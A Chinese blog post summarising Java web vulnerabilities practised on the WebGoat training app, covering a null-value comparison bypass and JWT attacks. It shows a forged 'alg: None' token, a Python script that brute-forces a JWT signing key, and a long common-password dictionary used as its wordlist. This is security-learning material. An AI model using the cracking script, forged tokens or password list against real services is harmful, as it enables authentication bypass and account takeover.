JAVA漏洞简单总结

carrot112232024-01-25 20:45

第一部分:Javaweb常见安全及代码漏洞

以开源项目webgoat-server-8.1.0为例,可以在GitHub上看到,直接可以下载jar包,在本地准备jdk环境,使用以下命令进行启动:

java -jar webgoat-server-8.1.0.jar --server.port=9091

WebGoat 版本可能是用 Java 11 或更高版本编译的,因此无法在 Java 8 上运行。再下一个麻烦,直接用idea打开jar包瞧瞧,我使用idea里面自带的下载jdk运行jar包,聪明如我哈哈哈:

哎呦,访问一下,成功!

想查看源代码,就把刚刚的jar包解压后丢尽idea中查看:

可以通过bp抓包看java是怎么请求的,了解请求过程,进行一些代码追踪。

第二部分:

当使用post提交数据与后端通过数据库查询出来的值做比较时,如果s1=1&s2=2失败的话,说明s1和s2的值不满足要求,我没也不知道数据库这两个值到底是什么,现在使用s3=&s4=有可能就可以绕过,因为数据库如果没有s3和s4的话,提交的null值,从数据库查出来的也是null值,最终判断就是可以相等的

第三部分:

JWT:和以前学过的cookie/session有些类似,也是用来验证用户身份的,在php,Java等语言中都有出现过,不过最常使用在Java/Python项目上。

参考文章:https://www.cnblogs.com/yokan/p/14468030.html(强烈建议看完再往下看)

如何判断一个网站是否采用了JWT验证,查看cookie中是否又以. 点好分割的三部分,每个部分由大小写区分的字母数字随机组合,因为jwt是由三部分组成的,header.payload.signature ,例如eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

可以看到这里有三段用.分割的内容:

第一段:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9

第二段:eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ

第三段:SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

我们把第一段解密一下看看:

举一个真实的例子看看:

在官网中查看这样一段东西:

如果身份验证这里,admin的值改为true,再将左边的值放到请求包中,是否修改了权限呢?不行!如果是这样,jwt发明的人不是白干了吗!!!真实情况是还要考虑其他复杂的因素。

那采用jwt的网站有哪些攻击方式呢?

继续参考该博客:https://www.cnblogs.com/yokan/p/14468030.html

JWT攻击方式:

  1. 利用加密算法:0x01 空加密算法:JWT支持使用空加密算法,可以在header中指定alg为None,当对方不验证空加密时的签名中,可以使用这种方式

{

"alg" : "None",

"typ" : "jwt"

}

{

"user" : "Admin"

}

在jwt中,算法和密匙缺一不可:

那就明白了上面单纯修改权限的地方为什么不可以了,因为知识简单修改了payload,而没有修改密匙。那想要攻击成功,就需要对方不验证密匙,也叫空模式加密。

  1. 利用爆破密匙:
    利用py脚本和字典进行破解:
    py脚本内容:

    import jwt
    import termcolor
    if name == "main":
    jwt_str = R'eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImlhdCI6MTY0MTg5Njc3MiwiZXhwIjoxNjQxODk2ODMyLCJzdWIiOiJ0b21Ad2ViZ29hdC5vcmciLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQub3JnIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.ZaBAasksu_uUYloJwpaNwzRhpIaHNSSYxSANfmNZ1Rk'
    with open('top1000.txt') as f:
    for line in f:
    key_ = line.strip()
    try:
    jwt.decode(jwt_str, verify=True, key=key_)
    print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')
    break
    except (jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError):
    print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')
    break
    except jwt.exceptions.InvalidSignatureError:
    print('\r', ' ' * 64, '\r\btry', key_, end='', flush=True)
    continue
    else:
    print('\r', '\bsorry! no key be found.')

字典内容top1000:

123456
123456789
111111
from91
12345678
123123
5201314
000000
11111111
a123456
163.com
fill.com
123321
123123123
00000000
victory
1314520
7758521
1234567
666666
123456a
1234567890
woaini
a123456789
888888
88888888
147258369
qq123456
654321
zxcvbnm
woaini1314
112233
5211314
123456abc
520520
aaaaaa
123654
987654321
123456789a
12345
7758258
100200
147258
111222
abc123456
111222tianya
121212
1111111
abc123
110110
789456
q123456
123456aa
aa123456
asdasd
999999
123qwe
789456123
1111111111
1314521
iloveyou
qwerty
password
qazwsx
159357
222222
woaini520
woaini123
521521
asd123
qqqqqq
qq1111
1234
qwe123
111111111
1qaz2wsx
qwertyuiop
5201314520
asd123456
159753
31415926
qweqwe
555555
333333
woaini521
abcd1234
ASDFGHJKL
123456qq
11223344
456123
123000
123698745
wangyut2
201314
zxcvbnm123
qazwsxedc
1q2w3e4r
z123456
123abc
a123123
12345678910
asdfgh
456789
qwe123456
321321
123654789
456852
0000000000
WOAIWOJIA
741852963
5845201314
aini1314
0123456789
a321654
123456123
584520
778899
520520520
7777777
q123456789
123789
zzzzzz
qweasdzxc
5845211314
123456q
w123456
12301230
qq123456789
wocaonima
qq123123
a5201314
a12345678
asdasdasd
a1234567
147852
110120
135792468
CAONIMA
963852741
3.1415926
1234560
101010
7758520
753951
666888
zxc123
0000000
zhang123
987654
a111111
1233211234567
789789
25257758
7708801314520
zzzxxx
1111
999999999
1357924680
yahoo.com.cn
123456789q
12341234
5841314520
zxc123456
yangyang
168168
123123qaz
abcd123456
456456
963852
as123456
741852
xiaoxiao
1230123
555666
000000000
369369
211314
102030
aaa123456
zxcvbn
110110110
buzhidao
qaz123
123456.
asdfasdf
123456789.
woainima
123456ASD
woshishui
131421
123321123
dearbook
1234qwer
qaz123456
aaaaaaaa
111222333
qq5201314
3344520
147852369
1q2w3e
windows
123456987
zz12369
qweasd
qiulaobai
66666666
12344321
qwer1234
a12345
7894561230
qwqwqw
777777
110120119
951753
wmsxie123
131420
1314520520
369258147
321321321
110119
beijing2008
321654
a000000
147896325
12121212
123456aaa
521521521
22222222
888999
123456789ABC
abc123456789
12345678900
1q2w3e4r5t
1234554321
www123456
w123456789
336699
abcdefg
709394
258369
z123456789
314159
584521
12345678a
7788521
9876543210
258258
111111a
87654321
123asd
5201314a
134679
135246
hotmail.com
123123a
11112222
131313
100200300
11111
1234567899
520530
251314
qq66666
yahoo.cn
123456qwe
worinima
sohu.com
NULL
518518
123457
q1w2e3r4
721521
123456789QQ
584131421
qw123456
123456..
0123456
135790
3344521
980099
a1314520
123456123456
qazwsx123
asdf1234
444444
123456z
120120
wang123456
12345600
7758521521
12369874
abcd123
a12369
li123456
1234567891
wang123
1234abcd
147369
zhangwei
qqqqqqqq
521125
010203
369258
654123
woailaopo
QAZQAZ
121314
1qazxsw2
zxczxc
l123456
111000
jingjing
0000
1472583690
25251325
langzi123
wojiushiwo
7895123
wangjian
123qweasd
110120130
1123581321
142536
584131420
aaa123
aaa111
woaiwoziji
520123
665544
ab123456
a123456a
fuckyou
99999999
5203344
qwertyui
521314
18881888
584201314
woaini@
7654321
20082008
520131
124578
852456
nihaoma
74108520
232323
55555555
zx123456
wwwwww
119119
weiwei
13145200
LOVE1314
564335
123456789123
wo123456
123520
52013145201314
loveyou
wolf8637
112358
5201314123
yuanyuan
zhanglei
zz123456
1234567A
a11111
000000a
321654987
xiaolong
5841314521
shmily
520025
159951
77585210
tiantian
134679852
QWASZX
123456654321
20080808
zhangjian
123465
9958123
159159
5508386
wangwei
5205201314
woaini5201314
888666
52013141314
qweqweqwe
1122334455
123456789z
585858
33333333
aa123123
qwertyuiop123
q111111
9638527410
911911
qqq111
5213344
sunshine
liu123456
abcdef
zhendeaini
007007
555888
qq111111
jiushiaini
mnbvcxz
xiaoqiang
445566
nicholas
dongdong
123456abcd
111qqq
aptx4869
258456
wobuzhidao
qazxsw
123789456
zhang123456
7215217758991
1234567890123
......
huang123
maomao
222333
wangyang
123456789aa
1.23457E+11
1234566
1230456
1a2b3c4d
13141314
a7758521
123456zxc
123456as
forever
s123456
12348765
xxxxxx
asdf123
a1b2c3d4
246810
333666
mingming
000123
jiajia
12qwaszx
ffffff
112233445566
77585211314
520131400
aa123456789
wpc000821
WANGJING
woaini1314520
&nbsp
000111
qq1314520
1234512345
147147
123456qaz
q123123
123456ab
xiaofeng
wodemima
shanshan
w2w2w2
666999
123456w
321456
feifei
dragon
computer
dddddd
zhangjie
baobao
x123456
q1w2e3
chenchen
12345679
131452
caonima123
asdf123456
tangkai
52013140
longlong
ssssss
www123
1234568
q1q1q1q1
asdfghjkl123
14789632
123456711
michael
tingting
woshishei
asd123456789
1314258
sunliu66
qwert12345
235689
565656
1234569
ww123456
1314159
5211314521
123456789w
123123aa
139.com@163.com
111111q
hao123456
52tiance
19830122
y123456
110119120
1231230
sj811212
13579246810
123.123
superman
789123
12345qwert
770880
js77777
zhangyang
686868
@163.com
imzzhan
xiaoyu
7758521a
abc12345
nihao123
wokaonima
q11111
623623623
989898
122333
13800138000
laopowoaini
787878
123456l
a123123123
198611
332211
tom.com
212121
woaini123456
wanglei
yang123456
zhangqiang
zxcvbnm,./
zhangyan
181818
234567
stryker
167669123
laopo520
2597758
aa5201314
139.com
5201314.
8888888888
74107410
zhanghao
77777777
zhangyu
zzb19860526
qwertyu
5201314qq
198612
q5201314
999888
369852
121121
1122334
123456789asd
123zxc
a123321
QWErtyUIO
456456456
qq000000
m123456
q1w2e3r4t5
woainilaopo
123456789*
131425
liuchang
85208520
zhangjing
c123456
asdfghjk
qq1234
asdzxc
hao123
777888
131131
woainia
beyond
zhang520
556688
123456qw
wangchao
woshiniba
168888
7758991
woshizhu
ainiyiwannian
LAOpo521
abcd123456789
qwerasdf
123456ok
woshinidie
huanhuan
1hxboqg2s
meiyoumima
456321
QQQ123456
1314
898989
123456798
pp.com@163.com
mm123456
123698741
a520520
z321321
asasas
YANG123
584211314
1234561
123456789+
miaomiao
789789789
7788520
AAAAAAa
h123456
3838438
l123456789
198511
ABCDEFG123
zhangjun
123qaz
198512
2525775
54545454
789632145
831213
10101010
xiaohe
19861010
10203
woshishen
0987654321
yj2009
wangqiang
198411
1314520a
xiaowei
123456000
123987
love520
caonimabi
qwe123123
010101
qq666666
789987
10161215
liangliang
qwert123
112112
qianqian
1a2b3c
198410
nuttertools
goodluck
zhangxin
18n28n24a5
liuyang
998877
woxiangni
7788250
a147258369
zhangliang
16897168
223344
123123456
a1b2c3
killer
321123
pp.com
chen123456
wangpeng
753159
775852100
1478963
1213141516
369369369
1236987
123369
12345a
bugaosuni
13145201314520
110112
123456...
JIAOJIAO
100100
1314520123
19841010
7758521123
shangxin
woshiwo
12312300
xingxing
yingying
1233210
34416912
qq12345
qweasd123
nishizhu
19861020
qwe123456789
808080
1310613106
456789123
44444444
123123qq
3141592653
556677
xx123456
jianjian
a1111111
0.123456
198610
loveme
tianshi
woxihuanni
11235813
252525
225588
lovelove
mengmeng
7758258520
xiaoming
shanghai
huyiming
6543210
a7758258
7788414
123456789..
Jordan
nishiwode
ZHUZHU
1314woaini
chenjian
131415
xy123456
123456520
a00000
jiang123
WOAIMAMA
monkey
7418529630
lingling
987456321
w5201314
qwer123456
198412
asdasd123
zzzzzzzz
1q1q1q
741741
987456
19851010
2587758
456654
Iloveyou1314
q12345
imissyou
daniel
aipai
2222222
0147258369
123456789l
q1234567
963963
123123123123
125521
womendeai
baobei520
19861015
667788
000000.
zhangtao
yy123456
chen123
nishishui
789654
liu123
19861212
1230
19841020
wangjun
wangliang
zhangpeng
woainimama
zhangchao
5201314q
19841025
123567
aaaa1111
123456+
134679258
668899
811009
qaz123456789
123456789qwe
111112
130130
19861016
wozhiaini
198712
123...
abcde12345
abcd12345
wanggang
llllll
5121314
456258
125125
qq7758521
369963
987987
142857
poiuytrewq
qqq123
323232
baobei
g227w212
962464
mylove
p1a6s3m
202020
19491001
963258
hhhhhh
2582587758
wangfeng
tiancai
11111111111
summer
wangwang
asd123123
19841024
xinxin
0.0.0.
19861012
19861210
8888888
zhanghui
wenwen
635241
ASDFGHJ
19861023
1234567890.
888168
19861120
tianya
123aaa
111aaa
123456789aaa
8008208820
123123q
football
dandan
www123456789
19861026
qingqing
315315
1111122222
171204jg
19861021
5555555
AS123456789
qqqwww
19861024
yahoo.com
19861225
1qaz1qaz
19871010
1029384756
123258
zxcv123
19861123
1314520.
aidejiushini
123qwe123
198711
operation
19861025
yu123456
19851225
wangshuai
19841015
520521
wangyan
19861011
7007
123456zz
521000
198311
299792458
112211
******
00000
qwer123
51201314
qazwsxedcrfv
LOVE5201314
198312
198510
888888888
1314521521
internet
z123123
a147258
696969
1234321
476730751
5201314789
012345
19861022
welcome
aqwe518951
19861121
HUANGwei
868686
wanghao
NIAIWOMA
xiaojian
19851120
19851212
100000
19841022
zhangbin
shadow
mmmmmm
000...
1357913579
77585217758521
19861216
19841016
az123456
zxcv1234
19841023
wu123456
163163
2008520085
pppppp
789654123
EtnXtxSa65
19851025
woaiwolaopo
ww111111
woaini110
123455
19841026
19881010
www163com
159357456
fangfang
19851015
19861013
19861220
12312
19861018
19861028
a11111111
19841018
119911
AI123456
198211
55555
zhangkai
wangxin
xihuanni
19871024
19861218
16899168
1010110
nimabi
19861125
52013143344
131452000
19871020
freedom
baobao520
winner
123456m
12312312
zhangwei
wangwei
wangfang
liwei
lina
test
admin
root
manage
administrator
guest
sever
system
zhangmin
lijing
wangjing
liuwei
wangxiuying
zhangli
lixiuying
wangli
zhangjing
zhangxiuying
liqiang
wangmin
limin
wanglei
liuyang
wangyan
wangyong
lijun
zhangyong
lijie
zhangjie
zhanglei
wangqiang
lijuan
wangjun
zhangyan
zhangtao
wangtao
liyan
wangchao
liming
liyong
wangjuan
liujie
liumin
lixia
lili
zhangjun
wangjie
zhangqiang
wangxiulan
wanggang
wangping
liufang
liuyan
liujun
liping
wanghui
chenjing
liuyong
liling
liguiying
wangdan
ligang
lidan
wangpeng
liutao
chenwei
zhanghua
liujing
litao
wangguiying
zhangxiulan
lihong
lichao
liuli
zhangguiying
wangyulan
zhangpeng
lixiulan
zhangchao
wangling
zhangling
lihua
wangfei
zhangyulan
wangguilan
wangying
liuqiang
chenxiuying
liying
lihui
limei
chenyong
wang
lifang
zhangguilan
libo
yangyong
wangxia
liguilan
wangbin
lipeng
zhangping
zhanghui
zhangyu
liujuan
libin
wanghao
chenjie
wangkai
chenli
chenmin
wangxiuzhen
liyulan
liuxiuying
zhangbo
liuguiying
yangxiuying
zhangying
yangli
zhangjian
wangbo
zhanghong
liudan
li
yangjing
liuchao
zhangjuan
yangfan
liuying
lixue
lixiuzhen
zhang
wangjian
liuyulan
liuhui
liubo
zhanghao
zhangming
chenyan
zhangxia
yangjie
wangshuai
wangxue
yangjun
zhangxu
liugang
wanghua
yangmin
wangning
lining
liuguilan
liubin
chentao
wangyumei
wangna
zhangbin
chenlong
lilin
wangyuzhen
zhangfengying
wanghong
lifengying
yangyang
wanglin
chenying
chenjun
liuxia
chenhao
zhangkai
chenfang
yangtao
yangbo
chenhong
liuhuan
wangyuying
chenjuan
chengang
zhanglin
zhangna
zhangyumei
wangfengying
zhangyuying
lihongmei
liujia
liulei
liupeng
wangxu
zhangxue
liyang
zhangxiuzhen
wangmei
wangjianhua
liyumei
liuping
yangmei
lifei
wangliang
lilei
lijianhua
wangyu
chenling
zhangjianhua
liu
zhangshuai
lijian
chenlin
chenqiang
zhaojing
wangcheng
zhangyuzhen
chenchao
chenliang
liuna
wangqin
zhanglanying
liuchang
yangyan
zhangliang
liyun
zhangqin
wanglanying
liyuzhen
chenguiying
yangchao
zhangmei
chenping
liuhong
zhaowei
zhangyun
zhangning
yanglin
gaofeng
wangjianguo
chenhua
yanghua
wangjianjun
yangliu
wangshuzhen
yangfang
lichunmei
wanghaiyan
liuling
chenchen
wanghuan
lidongmei
zhanglong
chenbo
chenlei
wangyun
wangfeng
wangxiurong
wangrui
liqin
liguizhen
chenpeng
liufei
wangxiuyun
chenming
wangguirong
lihao
wangzhiqiang
zhangdan
lifeng
zhanghongmei
liufengying
liyuying
wangxiumei
lijia
wanglijuan
chenhui
zhangfang
wangyuhua
zhangjianguo
lilanying
wangguizhen
lixiumei
chenyulan
chenxia
liukai
zhangyuhua
liuyumei
liuhua
libing
wangdong
lijianjun
liuyuzhen
lijianguo
yangwei
liguirong
wanglong
chenxiulan
zhangjianjun
lixiurong
liuming
zhoumin
zhangxiumei
lixuemei
huangwei
zhanghaiyan
wangshulan
lizhiqiang
yanglei
zhangxiurong
liujianhua
wanglili
zhaomin
chenyun
lihaiyan
zhangguirong
likai
zhangfeng
liuxiulan
zhangzhiqiang
lilong
lixiuyun
lixiufang
lishuai
lixin
liuyun
zhanglili
zhangxiuyun
wangshuying
wangchunmei
wanghongmei
chenbin
liyuhua
liguifang
chenfei
liuhao
huangxiuying
liuyuying
lishuzhen
huangyong
zhouwei
wangxiufang
wanglihua
wangdandan
wangguixiang
wangkun
lixiang
zhangrui
zhangguizhen
wangshuhua
liushuai
zhangfei
zhangxiufang
wangyang
zhangguifang
zhanglijuan
wangrong
wuxiuying
yangming
liguixiang
mali
yangxiulan
yangling
wangxiuhua
yangping
liliang
lirong
liguizhi
wangbing
wangguifang
wangming
chenmei
zhangchunmei
wangdongmei
liufeng
lixiuhua
lidandan
yangxue
liuyuhua
maxiuying
zhanglihua
zhangshuzhen
lixiaohong
wangxin
wangguizhi
zhaoli
zhangxiuhua
huangmin
yangjuan
wangjinfeng
zhoujie
chenjianhua
liumei
yangguiying
lishuying
chenyuying
yangxiuzhen
sunxiuying
zhaojun
zhaoyong
liubing
yangbin
liwen
sunwei
liuguizhen
liuyu
liujianjun
zhangshuying
lihongxia
zhaoxiuying
zhangrong
zhangfan
wangjianping
zhangguizhi
zhouyong
zhangkun
xuwei
wangguihua
liuqin
zhoujing
xumin
xujing
yanghong
yangziwen
zhangshulan
zhangwen
chenguilan
zhouli
lishuhua
chen
machao
liujianguo
liguihua
wangfenglan
lishulan
chenxiuzhen

也可以直接使用https://github.com/brendan-rius/c-jwt-cracker工具进行爆破

爆破之后的密匙:

  1. kid利用,详见博客文章。

第四部分:安全组件问题(log4j类似的东西)

从源码中也可以看到一些第三方组件信息(name+version):

然后看看这些东西有无爆出过漏洞,在网上找复现的poc

相关推荐
JY9403 分钟前
使用Qt制作一个简单的界面
开发语言·qt
ffyyhh9955115 分钟前
记一次kafka使用不当导致的服务器异常
java
不要飞升8 分钟前
百日筑基第十一天-看看SpringBoot
java·spring boot·后端·实习
萝卜地里的兔子10 分钟前
面向对象编程思想新解 第二章 编程的本质
java·开发语言
xw-pp11 分钟前
回溯法的小结与概述
java·数据结构·c++·python·算法·递归
weixin_3077791315 分钟前
C#实现求解函数在某一点的切线与法线函数
开发语言·c#
“抚琴”的人17 分钟前
C#——Path类详情
开发语言·数据库·microsoft·c#
创作小达人17 分钟前
InnoDB中的表级锁、页级锁、行级锁详解
java·数据库·mysql
回家吃月饼22 分钟前
python中unittest框架和pytest框架区别
开发语言·python·pytest
虫小宝22 分钟前
Java中的服务化架构设计与实现
java·开发语言
热门推荐
01Coze扣子平台完整体验和实践(附国内和国际版对比)02组基轨迹建模 GBTM的介绍与实现(Stata 或 R)03【经验分享】Ubuntu22.04安装微信(linux官方版)04yolov8实战第五天——yolov8+ffmpg实时视频流检测并进行实时推流——(推流,保姆教学)052025张宇考研数学,百度网盘视频课+36讲PDF讲义+真题06【立创EDA-PCB设计基础】6.布线铺铜实战及细节详解07基于coc.nvim打造开箱即用的个人PDE0851-2 万字长文,深度解读端到端自动驾驶的挑战和前沿09浏览器插件——ModHeader 的分享和学习10【漏洞复现】Geoserver远程代码执行漏洞(CVE-2024-36401)